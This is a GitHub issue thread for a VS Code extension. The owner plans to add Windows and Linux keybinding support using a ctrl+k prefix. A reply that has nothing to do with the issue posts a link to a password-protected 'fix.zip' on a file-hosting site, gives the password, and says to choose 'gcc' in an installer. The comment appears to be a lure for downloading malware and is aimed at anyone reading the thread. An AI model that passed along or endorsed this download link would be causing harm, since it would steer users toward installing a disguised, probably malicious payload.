### ISSUE TITLE
[Feat] windows & linux support

### ISSUE THREAD

**Issue by tjx666** [tjx666/vscode-classic-experience#2]
Current, this extension only restore the keybindings on mac platform, we need to consider windows and linux uses. 

On windows and linux, the prefix key should be `ctrl + k`.

I will try to support this night.

**Comment by fan1chun** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."
